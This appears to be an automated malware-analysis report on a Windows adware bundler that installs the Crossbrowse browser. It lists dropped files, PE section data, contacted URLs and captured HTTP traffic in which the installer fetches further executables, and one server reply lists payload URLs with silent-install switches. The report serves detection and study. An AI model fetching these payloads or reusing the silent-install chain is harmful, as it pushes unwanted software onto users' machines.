%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\gu.pak (1705 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\mr.pak (1709 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sv.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe (5873 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\es.pak (231 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\zh-CN.pak (188 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ms.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\resources.pak (117997 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\it.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fr.pak (240 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sl.pak (212 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\kn.pak (1769 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ro.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\39.6.2171.95.manifest (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\chrome.7z (1150215 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ar.pak (294 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\nb.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Extensions\external_extensions.json (99 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\nacl64.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\en-GB.pak (190 bytes)
%Documents and Settings%\All Users\Desktop\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\te.pak (1762 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\lt.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\PepperFlash\pepflashplayer.dll (110258 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\crossbrowse.exe (3869 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ml.pak (1827 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ru.pak (1613 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\nl.pak (217 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\bg.pak (1641 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\pt-BR.pak (218 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\vi.pak (248 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\icudtl.dat (76792 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\secondarytile.png (3 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\tr.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\master_preferences (814 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\VisualElementsManifest.xml (394 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\pdf.dll (67091 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome.dll (237340 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\de.pak (225 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\lv.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\libegl.dll (204 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\am.pak (302 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sk.pak (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst13.tmp (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss23.tmp (63911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp (17497 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy19.tmp (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2A.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy24.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bseLbpD9T[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\CZPOAqqx9[1] (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi18.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Cdn[1].exe (63911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\installer[1].exe (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxE.tmp (5397 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.0.1
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.1
File Description:
Comments:
Language: English (United Kingdom)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23130 | 23552 | 4.44841 | 0bc2ffd32265a08d72b795b18265828d |
.rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
.data | 36864 | 110488 | 1024 | 3.26405 | 975304d6dd6c4a4f076b15511e2bbbc0 |
.ndata | 147456 | 8052736 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 8200192 | 17160 | 17408 | 4.10925 | 8c98f8e8949701fab7362cf5fee6aa77 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 111
Network Activity
URLs
URL | IP |
---|---|
hxxp://download-servers.com/SysInfo/Validate.exe | 95.211.189.16 |
hxxp://download-servers.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk= | 95.211.189.16 |
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | 216.137.59.12 |
hxxp://download-servers.com/SysInfo/validator/timer.php | 95.211.189.16 |
hxxp://cds.c5z6s5a3.hwcdn.net/crcb/123/installer.exe | |
hxxp://ipgeoapi.com/ | 54.235.114.210 |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003040&browserver=106&country=UA&event=3&rnd=9035 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003040&default=ie&ver=106&crtnm=OralTeams&rnd=45 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=100&n=install_browser_start_async&ibic=0beb334165382025853a9a860db0b131&rnd=2056 | |
hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe | 216.137.59.83 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=250&n=install_browser_downloading&ibic=0beb334165382025853a9a860db0b131&rnd=9183 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=270&n=install_browser_all_thread_created_success&ibic=0beb334165382025853a9a860db0b131&rnd=2165 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.004 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.001 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.005 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.003 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.002 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=310&n=install_browser_all_thread_ended_success&ibic=0beb334165382025853a9a860db0b131&rnd=1604 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=360&n=install_browser_all_files_in_place&ibic=0beb334165382025853a9a860db0b131&rnd=8259 | |
hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe | |
hxxp://p-rumo00.kxcdn.com/Cdn.exe | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
hxxp://download-servers.com/SysInfo/tem.php?sid=83837567483 | 95.211.189.16 |
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 54.243.78.255 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=410&n=install_browser_install_ch_success&ibic=0beb334165382025853a9a860db0b131&rnd=2512 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003040&i=480&n=install_browser_end_success&ibic=0beb334165382025853a9a860db0b131&rnd=8780 | |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=310&n=install_browser_all_thread_ended_success&ibic=0beb334165382025853a9a860db0b131&rnd=1604 | 54.231.15.52 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=250&n=install_browser_downloading&ibic=0beb334165382025853a9a860db0b131&rnd=9183 | 54.231.15.52 |
hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe | 205.185.216.42 |
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003040&default=ie&ver=106&crtnm=OralTeams&rnd=45 | 54.231.13.84 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=410&n=install_browser_install_ch_success&ibic=0beb334165382025853a9a860db0b131&rnd=2512 | 54.231.15.52 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=270&n=install_browser_all_thread_created_success&ibic=0beb334165382025853a9a860db0b131&rnd=2165 | 54.231.15.52 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.005 | 69.16.175.42 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=100&n=install_browser_start_async&ibic=0beb334165382025853a9a860db0b131&rnd=2056 | 54.231.15.52 |
hxxp://livestatscounter.com/SysInfo/validator/timer.php | 95.211.189.16 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.003 | 69.16.175.42 |
hxxp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483 | 95.211.189.6 |
hxxp://cdn-14b7.kxcdn.com/Cdn.exe | 194.63.141.18 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=360&n=install_browser_all_files_in_place&ibic=0beb334165382025853a9a860db0b131&rnd=8259 | 54.231.15.52 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003040&browserver=106&country=UA&event=3&rnd=9035 | 69.16.175.10 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.004 | 69.16.175.42 |
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk= | 95.211.189.16 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003040&i=480&n=install_browser_end_success&ibic=0beb334165382025853a9a860db0b131&rnd=8780 | 54.231.15.52 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.002 | 69.16.175.42 |
hxxp://www.downloadsoup.com/thankyou.php | 54.225.142.102 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.001 | 69.16.175.42 |
hxxp://dl.randkeygen.com/crcb/123/installer.exe | 69.16.175.42 |
d24u51ac8ybaqu.cloudfront.net | 216.137.59.61 |
s3.amazonaws.com | 54.231.48.51 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /crossbrowse/ie/106/ie.zip.003 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:30 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=72684
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1446793111.dop014.fr7.t,1446793110.cds062.fr7.c
<<< skipped >>>
GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d1mdi78qyff344.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 54771
Connection: keep-alive
Date: Thu, 05 Nov 2015 20:50:36 GMT
Last-Modified: Thu, 05 Nov 2015 15:37:34 GMT
ETag: "798e76757d49d72f41b8eebe1e77a852"
Accept-Ranges: bytes
Server: AmazonS3
Age: 36476
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0MOc63dPygCjoFtEKtUWSxsVzbZJyqNOj52rKmKEyeYqC2Q8_vAqig==
<<< skipped >>>
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 06 Nov 2015 06:58:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.24
4ac..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=obi-imi-tot-mdh-cpm-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_42cd63.exe.. asslHp==02OR:Ll5tt.R9Ryf?L~0n:LPsyPWs=ftil=_V9/ylls..hXXp://dl.randkeygen.com/crcb/123/installer.exe.. /installapp..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..http://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..hXXp://cdn-14b7.kxcdn.com/Cdn.exe.. ..hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483.. ..hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542.. ..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe..hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=iml..hXXp://VVV.codec13sudha.com/download.php?l4J9dw==..hXXp://get.file167desktop.info/DownloadManager/Get?p=16434&d=30338&l=29565&n=1&productname=DownloadManager&exeurl=hXXp://download-servers.com/SysInfo/VOStub.exe&dynamicname=Updates&filename=EpLWWQ..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..0..HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 06 Nov 2015 06:58:25 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.24..4ac..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=obi-imi-tot-mdh-cpm-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..http
<<< skipped >>>
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 06 Nov 2015 06:58:26 GMT
Content-Type: application/octet-stream
Content-Length: 125154
Connection: keep-alive
X-Powered-By: PHP/5.5.24
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=bseLbpD9T.exe
<<< skipped >>>
GET /crcb/123/installer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.randkeygen.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:27 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1440089314"
Last-Modified: Thu, 20 Aug 2015 16:48:34 GMT
Cache-Control: max-age=721
Content-Length: 1965128
Content-Type: application/x-msdownload
X-HW: 1446793107.dop008.fr7.t,1446793107.cds054.fr7.c
<<< skipped >>>
GET /crossbrowse/ie/106/ie.zip.001 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:31 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=79597
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1446793111.dop013.fr7.t,1446793111.cds070.fr7.c
<<< skipped >>>
GET /crossbrowse/ie/106/ie.zip.002 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:31 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=72682
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1446793111.dop014.fr7.t,1446793111.cds054.fr7.c
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:29 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}
GET /Cdn.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cdn-14b7.kxcdn.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: keycdn-engine
Date: Fri, 06 Nov 2015 06:58:46 GMT
Content-Type: application/octet-stream
Content-Length: 1011912
Connection: keep-alive
Last-Modified: Tue, 03 Nov 2015 17:14:18 GMT
ETag: "5638eb6a-f70c8"
Expires: Fri, 13 Nov 2015 06:58:46 GMT
Cache-Control: max-age=604800
X-Edge-Location: rumo
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
<<< skipped >>>
GET /data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003040&browserver=106&country=UA&event=3&rnd=9035 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:30 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1446793110.dop014.fr7.t,1446793110.cds054.fr7.c
GIF89a.............,...........D..;
GET /crossbrowse/ie/106/ie.zip.004 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:30 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=72683
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1446793111.dop013.fr7.t,1446793110.cds072.fr7.c
<<< skipped >>>
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 43212
Connection: keep-alive
Date: Thu, 05 Nov 2015 15:06:07 GMT
Last-Modified: Thu, 05 Nov 2015 15:00:52 GMT
